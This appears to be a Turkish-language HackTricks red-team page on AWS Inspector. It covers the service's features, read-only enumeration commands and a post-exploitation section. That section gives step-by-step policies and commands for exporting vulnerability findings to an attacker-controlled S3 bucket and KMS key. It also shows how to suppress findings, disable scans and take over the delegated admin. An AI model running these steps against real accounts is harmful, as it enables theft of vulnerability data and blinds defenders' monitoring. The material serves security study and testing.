AWS - Inspector Enum

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Inspector

Amazon Inspector, AWS ortamınızın güvenliğini artırmak için tasarlanmış gelişmiş, otomatik bir zafiyet yönetim hizmetidir. Bu hizmet, Amazon EC2 örneklerini, Amazon ECR’deki konteyner görüntülerini, Amazon ECS’yi ve AWS Lambda işlevlerini sürekli olarak zafiyetler ve istenmeyen ağ maruziyeti için tarar. Güçlü bir zafiyet istihbarat veritabanından yararlanarak, Amazon Inspector, ciddiyet seviyeleri ve düzeltme önerileri dahil olmak üzere ayrıntılı bulgular sunar ve kuruluşların güvenlik risklerini proaktif bir şekilde tanımlayıp ele almasına yardımcı olur. Bu kapsamlı yaklaşım, çeşitli AWS hizmetleri arasında güçlendirilmiş bir güvenlik duruşu sağlar ve uyum ile risk yönetimine yardımcı olur.

Ana unsurlar

Bulgular

Amazon Inspector’daki bulgular, EC2 örnekleri, ECR depoları veya Lambda işlevleri taraması sırasında keşfedilen zafiyetler ve maruziyetler hakkında ayrıntılı raporlardır. Durumuna göre, bulgular şu şekilde kategorize edilir:

  • Aktif: Bulgular düzeltilmemiştir.
  • Kapalı: Bulgular düzeltilmiştir.
  • Baskılanmış: Bulgular, bir veya daha fazla baskılama kuralı nedeniyle bu durumla işaretlenmiştir.

Bulgular ayrıca üç türde kategorize edilir:

  • Paket: Bu bulgular, kaynaklarınızda kurulu yazılım paketlerindeki zafiyetlerle ilgilidir. Örnekler arasında bilinen güvenlik sorunları olan eski kütüphaneler veya bağımlılıklar bulunur.
  • Kod: Bu kategori, AWS kaynaklarınızda çalışan uygulamaların kodunda bulunan zafiyetleri içerir. Yaygın sorunlar, güvenlik ihlallerine yol açabilecek kodlama hataları veya güvensiz uygulamalardır.
  • : Ağ bulguları, saldırganlar tarafından istismar edilebilecek ağ yapılandırmalarındaki potansiyel maruziyetleri tanımlar. Bunlar arasında açık portlar, güvensiz ağ protokolleri ve yanlış yapılandırılmış güvenlik grupları bulunur.

Filtreler ve Baskılama Kuralları

Amazon Inspector’daki filtreler ve baskılama kuralları, bulguları yönetmeye ve önceliklendirmeye yardımcı olur. Filtreler, bulguları ciddiyet veya kaynak türü gibi belirli kriterlere göre daraltmanıza olanak tanır. Baskılama kuralları, düşük risk olarak değerlendirilen, zaten hafifletilmiş veya başka önemli nedenlerle belirli bulguları baskılamanıza olanak tanır; bu, güvenlik raporlarınızı aşırı yüklenmekten korur ve daha kritik sorunlara odaklanmanızı sağlar.

Yazılım Malzeme Listesi (SBOM)

Amazon Inspector’daki Yazılım Malzeme Listesi (SBOM), bir yazılım paketinin içindeki tüm bileşenleri, kütüphaneleri ve bağımlılıkları detaylandıran dışa aktarılabilir bir iç içe envanter listesidir. SBOM’lar, yazılım tedarik zincirine şeffaflık sağlamaya yardımcı olur, daha iyi zafiyet yönetimi ve uyum sağlar. Açık kaynak ve üçüncü taraf yazılım bileşenleriyle ilişkili riskleri tanımlamak ve hafifletmek için kritik öneme sahiptir.

Ana özellikler

Bulguları dışa aktarma

Amazon Inspector, bulguları Amazon S3 Buckets, Amazon EventBridge ve AWS Security Hub’a dışa aktarma yeteneği sunar; bu, belirli bir tarih ve saatte tanımlanan zafiyetler ve maruziyetler hakkında ayrıntılı raporlar oluşturmanıza olanak tanır. Bu özellik, CSV ve JSON gibi çeşitli çıktı formatlarını destekler, diğer araçlar ve sistemlerle entegrasyonu kolaylaştırır. Dışa aktarma işlevi, raporlara dahil edilen verilerin özelleştirilmesine olanak tanır; bu, bulguları ciddiyet, kaynak türü veya tarih aralığı gibi belirli kriterlere göre filtrelemenizi sağlar ve varsayılan olarak mevcut AWS Bölgesi’ndeki tüm bulgularınızı Aktif durumla dahil eder.

Bulguları dışa aktarırken, verileri dışa aktarım sırasında şifrelemek için bir Anahtar Yönetim Hizmeti (KMS) anahtarı gereklidir. KMS anahtarları, dışa aktarılan bulguların yetkisiz erişime karşı korunmasını sağlar ve hassas zafiyet bilgileri için ekstra bir güvenlik katmanı sağlar.

Amazon EC2 örneklerini tarama

Amazon Inspector, Amazon EC2 örnekleri için zafiyetleri ve güvenlik sorunlarını tespit etmek üzere güçlü tarama yetenekleri sunar. Inspector, EC2 örneğinden çıkarılan meta verileri, paket zafiyetleri ve ağ erişilebilirlik sorunları üretmek için güvenlik tavsiyelerindeki kurallarla karşılaştırır. Bu taramalar, hesabınızın tarama modu ayarlarına bağlı olarak ajan tabanlı veya ajansız yöntemlerle gerçekleştirilebilir.

  • Ajan Tabanlı: Derinlemesine taramalar gerçekleştirmek için AWS Systems Manager (SSM) ajanını kullanır. Bu yöntem, örnekten doğrudan kapsamlı veri toplama ve analiz yapma olanağı sağlar.
  • Ajansız: Örnekte bir ajan kurulumunu gerektirmeyen hafif bir alternatif sunar, her EC2 örneğinin her bir hacminin EBS anlık görüntüsünü oluşturur, zafiyetleri arar ve ardından siler; mevcut AWS altyapısını tarama için kullanır.

Tarama modu, EC2 taramalarını gerçekleştirmek için hangi yöntemin kullanılacağını belirler:

  • Ajan Tabanlı: Derin inceleme için EC2 örneklerine SSM ajanı kurmayı içerir.
  • Hibrit Tarama: Kapsamı maksimize etmek ve performans etkisini en aza indirmek için hem ajan tabanlı hem de ajansız yöntemleri birleştirir. SSM ajanının kurulu olduğu EC2 örneklerinde, Inspector ajan tabanlı bir tarama gerçekleştirecek, SSM ajanının olmadığı örneklerde ise ajansız bir tarama yapılacaktır.

Bir diğer önemli özellik, EC2 Linux örnekleri için derin incelemedir. Bu özellik, EC2 Linux örneklerinin yazılımı ve yapılandırmasını kapsamlı bir şekilde analiz eder, işletim sistemi zafiyetleri, uygulama zafiyetleri ve yanlış yapılandırmalar dahil olmak üzere ayrıntılı zafiyet değerlendirmeleri sağlar ve kapsamlı bir güvenlik değerlendirmesi sunar. Bu, özel yollar ve tüm alt dizinlerinin incelenmesi yoluyla gerçekleştirilir. Varsayılan olarak, Amazon Inspector aşağıdakileri tarar, ancak her üye hesap 5’e kadar daha fazla özel yol tanımlayabilir ve her delege edilmiş yönetici 10’a kadar tanımlayabilir:

  • /usr/lib
  • /usr/lib64
  • /usr/local/lib
  • /usr/local/lib64

Amazon ECR konteyner görüntülerini tarama

Amazon Inspector, Amazon Elastic Container Registry (ECR) konteyner görüntüleri için güçlü tarama yetenekleri sunar ve paket zafiyetlerinin etkili bir şekilde tespit edilmesini ve yönetilmesini sağlar.

  • Temel Tarama: Bu, konteyner görüntülerindeki bilinen işletim sistemi paketleri zafiyetlerini tanımlayan hızlı ve hafif bir taramadır; açık kaynak Clair projesinden standart bir kural seti kullanır. Bu tarama yapılandırması ile, depolarınız itme sırasında veya manuel taramalar gerçekleştirildiğinde taranır.
  • Gelişmiş Tarama: Bu seçenek, itme taramasına ek olarak sürekli tarama özelliğini ekler. Gelişmiş tarama, her konteyner görüntüsünün katmanlarına daha derinlemesine dalarak işletim sistemi paketlerindeki ve programlama dilleri paketlerindeki zafiyetleri daha yüksek doğrulukla tanımlar. Hem temel görüntüyü hem de ek katmanları analiz ederek potansiyel güvenlik sorunlarının kapsamlı bir görünümünü sağlar.

Amazon Lambda işlevlerini tarama

Amazon Inspector, AWS Lambda işlevleri ve katmanları için kapsamlı tarama yetenekleri içerir ve sunucusuz uygulamaların güvenliğini ve bütünlüğünü sağlar. Inspector, Lambda işlevleri için iki tür tarama sunar:

  • Lambda standart taraması: Bu varsayılan özellik, Lambda işlevinize ve katmanlarına eklenen yazılım zafiyetlerini tanımlar. Örneğin, işleviniz bilinen bir zafiyete sahip bir kütüphane versiyonu olan python-jwt kullanıyorsa, bir bulgu oluşturur.
  • Lambda kod taraması: Güvenlik sorunları için özel uygulama kodunu analiz eder, enjeksiyon hataları, veri sızıntıları, zayıf kriptografi ve eksik şifreleme gibi zafiyetleri tespit eder. Tespit edilen zafiyetleri vurgulayan kod parçacıklarını yakalar, örneğin, sabit kodlanmış kimlik bilgileri. Bulgular, sorunları düzeltmek için ayrıntılı düzeltme önerileri ve kod parçacıkları içerir.

İnternet Güvenliği Merkezi (CIS) taramaları

Amazon Inspector, Amazon EC2 örnek işletim sistemlerini İnternet Güvenliği Merkezi (CIS) tarafından önerilen en iyi uygulama önerilerine karşı değerlendirmek için CIS taramaları içerir. Bu taramalar, yapılandırmaların endüstri standartı güvenlik temel ilkelerine uyduğundan emin olur.

  • Yapılandırma: CIS taramaları, sistem yapılandırmalarının belirli CIS Benchmark önerilerini karşılayıp karşılamadığını değerlendirir; her kontrol, bir CIS kontrol kimliği ve başlığı ile bağlantılıdır.
  • Uygulama: Taramalar, örnek etiketlerine ve tanımlı takvimlere göre gerçekleştirilir veya planlanır.
  • Sonuçlar: Tarama sonrası sonuçlar, hangi kontrollerin geçtiğini, atlandığını veya başarısız olduğunu gösterir ve her örneğin güvenlik duruşu hakkında içgörü sağlar.

Sayım

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Exploitation

Tip

Bir saldırganın perspektifinden, bu hizmet, saldırgana diğer örnekleri/konteynerleri tehlikeye atmasına yardımcı olabilecek zayıflıkları ve ağ maruziyetlerini bulmasına yardımcı olabilir.

Ancak, bir saldırgan bu hizmeti bozmakla da ilgilenebilir, böylece kurban zayıflıkları göremez (tümü veya belirli olanlar).

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Bir saldırgan, zayıflıkların veya yazılım malzeme listelerinin (SBOM) ayrıntılı raporlarını oluşturabilir ve bunları AWS ortamınızdan dışarı aktarabilir. Bu bilgi, belirli zayıflıkları, güncel olmayan yazılımları veya güvensiz bağımlılıkları tanımlamak için kullanılabilir ve hedefli saldırılara olanak tanır.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

Aşağıdaki örnek, tüm Aktif bulguları bir saldırganın kontrolündeki Amazon S3 Bucket’a ve bir saldırganın kontrolündeki Amazon KMS anahtarına nasıl dışarı aktaracağınızı göstermektedir:

  1. Bir Amazon S3 Bucket oluşturun ve kurban Amazon Inspector’dan erişilebilir olması için ona bir politika ekleyin:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}
  1. Bir Amazon KMS anahtarı oluşturun ve kurbanın Amazon Inspector’ı tarafından kullanılabilmesi için ona bir politika ekleyin:
{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}
  1. Bulgular raporunu oluşturma komutunu çalıştırın ve dışa aktarın:
aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
  • Olası Etki: Ayrıntılı zafiyet ve yazılım raporlarının üretilmesi ve dışa aktarılması, belirli zafiyetler ve güvenlik zayıflıkları hakkında içgörüler elde edilmesi.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Bir saldırgan, belirtilen bulgular raporunun veya SBOM raporunun üretilmesini iptal edebilir, bu da güvenlik ekiplerinin zafiyetler ve yazılım malzeme listeleri (SBOM’lar) hakkında zamanında bilgi almasını engelleyerek güvenlik sorunlarının tespitini ve giderilmesini geciktirebilir.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>
  • Potansiyel Etki: Güvenlik izleme sisteminin kesintiye uğraması ve güvenlik sorunlarının zamanında tespit edilmesi ve giderilmesini engelleme.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Bu izinlere sahip bir saldırgan, hangi güvenlik açıklarının ve güvenlik sorunlarının raporlanacağını veya bastırılacağını belirleyen filtreleme kurallarını manipüle edebilir (eğer action SUPPRESS olarak ayarlandıysa, bir bastırma kuralı oluşturulacaktır). Bu, kritik güvenlik açıklarını güvenlik yöneticilerinden gizleyerek, bu zayıflıkları tespit edilmeden istismar etmeyi kolaylaştırabilir. Önemli filtreleri değiştirerek veya kaldırarak, bir saldırgan ayrıca sistemi alakasız bulgularla doldurarak gürültü yaratabilir, bu da etkili güvenlik izleme ve yanıtı engelleyebilir.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>
  • Potansiyel Etki: Kritik zafiyetlerin gizlenmesi veya bastırılması ya da sistemi alakasız bulgularla doldurma.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Bir saldırgan, güvenlik yönetim yapısını önemli ölçüde bozabilir.

  • Delegated admin hesabını devre dışı bırakarak, saldırgan güvenlik ekibinin Amazon Inspector ayarlarına ve raporlarına erişimini ve yönetimini engelleyebilir.
  • Yetkisiz bir admin hesabının etkinleştirilmesi, saldırgana güvenlik yapılandırmalarını kontrol etme imkanı tanır; bu, taramaları devre dışı bırakma veya kötü niyetli faaliyetleri gizlemek için ayarları değiştirme potansiyeli taşır.

Warning

Yetkisiz hesabın, delege yönetici olabilmesi için mağdur ile aynı Organizasyon içinde olması gerekmektedir.

Yetkisiz hesabın delege yönetici olabilmesi için, önce meşru delege yöneticinin devre dışı bırakılması ve ardından yetkisiz hesabın delege yönetici olarak etkinleştirilmeden önce, meşru yöneticinin organizasyondan delege yönetici olarak kaydının silinmesi gerekmektedir. Bu, aşağıdaki komut ile yapılabilir (organizations:DeregisterDelegatedAdministrator izni gereklidir): aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
  • Potansiyel Etki: Güvenlik yönetiminin kesintiye uğraması.

inspector2:AssociateMember, inspector2:DisassociateMember

Bir saldırgan, Amazon Inspector organizasyonu içindeki üye hesaplarının ilişkilendirilmesini manipüle edebilir. Yetkisiz hesapları ilişkilendirerek veya meşru olanları ilişkilendirmeyerek, bir saldırgan hangi hesapların güvenlik taramalarına ve raporlamalara dahil edileceğini kontrol edebilir. Bu, kritik hesapların güvenlik izlemelerinden hariç tutulmasına yol açabilir ve saldırganın bu hesaplardaki zafiyetleri tespit edilmeden istismar etmesine olanak tanıyabilir.

Warning

Bu işlem, yetkilendirilmiş yönetici tarafından gerçekleştirilmelidir.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>
  • Potansiyel Etki: Anahtar hesapların güvenlik taramalarından hariç tutulması, zafiyetlerin tespit edilmeden istismar edilmesine olanak tanır.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

inspector2:Disable iznine sahip bir saldırgan, belirli hesaplar üzerindeki belirli kaynak türleri (EC2, ECR, Lambda, Lambda kodu) için güvenlik taramalarını devre dışı bırakabilir, bu da AWS ortamının bazı kısımlarının izlenmeden kalmasına ve saldırılara karşı savunmasız olmasına neden olur. Ayrıca, inspector2:Enable & iam:CreateServiceLinkedRole izinlerine sahip olarak, bir saldırgan şüpheli yapılandırmaların tespit edilmesini önlemek için taramaları seçici olarak yeniden etkinleştirebilir.

Warning

Bu işlem, yetkilendirilmiş yönetici tarafından gerçekleştirilmelidir.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
  • Olası Etki: Güvenlik izleme alanında kör noktaların oluşumu.

inspector2:UpdateOrganizationConfiguration

Bu izne sahip bir saldırgan, Amazon Inspector organizasyonunuzun yapılandırmalarını güncelleyebilir ve bu, yeni üye hesapları için etkinleştirilen varsayılan tarama özelliklerini etkileyebilir.

Warning

Bu işlem, yetkilendirilmiş yönetici tarafından gerçekleştirilmelidir.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
  • Potansiyel Etki: Organizasyon için güvenlik tarama politikalarını ve yapılandırmalarını değiştirme.

inspector2:TagResource, inspector2:UntagResource

Bir saldırgan, güvenlik değerlendirmelerini düzenlemek, izlemek ve otomatikleştirmek için kritik olan AWS Inspector kaynaklarındaki etiketleri manipüle edebilir. Etiketleri değiştirerek veya kaldırarak, bir saldırgan güvenlik taramalarından zafiyetleri gizleyebilir, uyum raporlamasını bozabilir ve otomatik düzeltme süreçlerini etkileyebilir, bu da kontrolsüz güvenlik sorunlarına ve sistem bütünlüğünün tehlikeye girmesine yol açabilir.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
  • Potansiyel Etki: Açıkların gizlenmesi, uyum raporlamasının kesintiye uğraması, güvenlik otomasyonunun kesintiye uğraması ve maliyet tahsisinin kesintiye uğraması.

Referanslar

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin